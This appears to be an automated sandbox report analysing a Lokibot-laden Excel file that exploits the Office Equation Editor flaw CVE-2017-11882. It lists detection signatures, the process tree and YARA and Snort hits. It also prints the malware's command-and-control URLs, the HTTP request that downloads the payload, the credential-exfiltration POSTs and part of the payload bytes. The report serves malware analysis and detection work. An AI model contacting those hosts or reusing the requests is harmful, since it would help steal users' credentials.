Play interactive tour

Edit tour

Windows Analysis Report Shipping-Documents.xlsx

Overview

General Information

Sample Name:	Shipping-Documents.xlsx
Analysis ID:	435330
MD5:	20e540ed9d02f60f7fb928ed8fe60f1f
SHA1:	afa6c289fbeed004fe3a52c666cf32a8ae444e79
SHA256:	3c48a312d69b2d72bec8b3dad17e99ee1241afff875e97b73569509d5f8b07ec
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

Yara detected Lokibot

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches the installation path of Mozilla Firefox

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2520 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2724 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2856 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7146B0D2CAED6422C289A08F63A5C685)

vbc.exe (PID: 3052 cmdline: C:\Users\Public\vbc.exe MD5: 7146B0D2CAED6422C289A08F63A5C685)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/S4wFP8QBww9Tp"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x207637:$des3: 68 03 66 00 00 0x20ba28:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x20baf4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1ebef:$des3: 68 03 66 00 00 0x22fec:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x230b8:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: vbc.exe PID: 2856	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2856	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vbc.exe PID: 2856	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: vbc.exe PID: 3052	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 3052	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vbc.exe PID: 3052	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.vbc.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.vbc.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.vbc.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.vbc.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.vbc.exe.355d638.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
4.2.vbc.exe.355d638.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.vbc.exe.355d638.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
4.2.vbc.exe.355d638.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.2.vbc.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.vbc.exe.355d638.4.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
4.2.vbc.exe.355d638.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vbc.exe.355d638.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.vbc.exe.355d638.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.vbc.exe.355d638.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.2.vbc.exe.355d638.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 15 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.89.90.94, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2724, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/S4wFP8QBww9Tp"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe	ReversingLabs: Detection: 10%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 10%

Multi AV Scanner detection for submitted file

Show sources

Source: Shipping-Documents.xlsx	Virustotal: Detection: 40%			Perma Link
Source: Shipping-Documents.xlsx	ReversingLabs: Detection: 31%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Source: excel.exe

Memory has grown: Private usage: 4MB later: 64MB

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 63.141.228.141:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://63.141.228.141/32.php/S4wFP8QBww9Tp

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:29:38 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 00:49:42 GMTETag: "ba000-5c4d77753dec3"Accept-Ranges: bytesContent-Length: 761856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 4a c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 94 0b 00 00 0a 00 00 00 00 00 00 de b2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 b2 0b 00 4b 00 00 00 00 c0 0b 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 3f b2 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 92 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 06 00 00 00 c0 0b 00 00 08 00 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b2 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 26 01 00 68 05 01 00 03 00 00 00 01 00 00 06 50 2c 02 00 ef 85 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 13 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bb 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 03 00 00 00 16 39 53 00 00 00 26 02 16 28 11 00 00 0a 38 0b 00 00 00 26 20 01 00 00 00 38 3b 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 2a 00 00 00 02 16 28 07 00 00 06 20 06 00 00 00 38 19 00 00 00 02 16 28 09 00 00 06 38 bb ff ff ff 20 03 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 c2 ff ff ff a0 ff ff ff c2 ff ff ff b1 ff ff ff 90 ff ff ff 89 ff ff ff 10 00 00 00 2f 00 00 00 20 05 00 00 00 28 05 00 00 06 3a cc ff ff ff 26 02 16 28 08 00 00 06 16 28 05 00 00 06 39 73 ff ff ff 26 20 00 00 00 00 16 39 ad ff ff ff 26 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 6f 23 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 2

Source: Joe Sandbox View

IP Address: 63.141.228.141 63.141.228.141

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View	ASN Name: NOCIXUS NOCIXUS

Source: global traffic	HTTP traffic detected: GET /pzldoc/regasm.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.89.90.94Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.89.90.94

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00404ED4 recv,

5_2_00404ED4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6AB76E0.emf

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /pzldoc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.89.90.94Connection: Keep-Alive

Source: unknown

HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Jun 2021 10:29:47 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 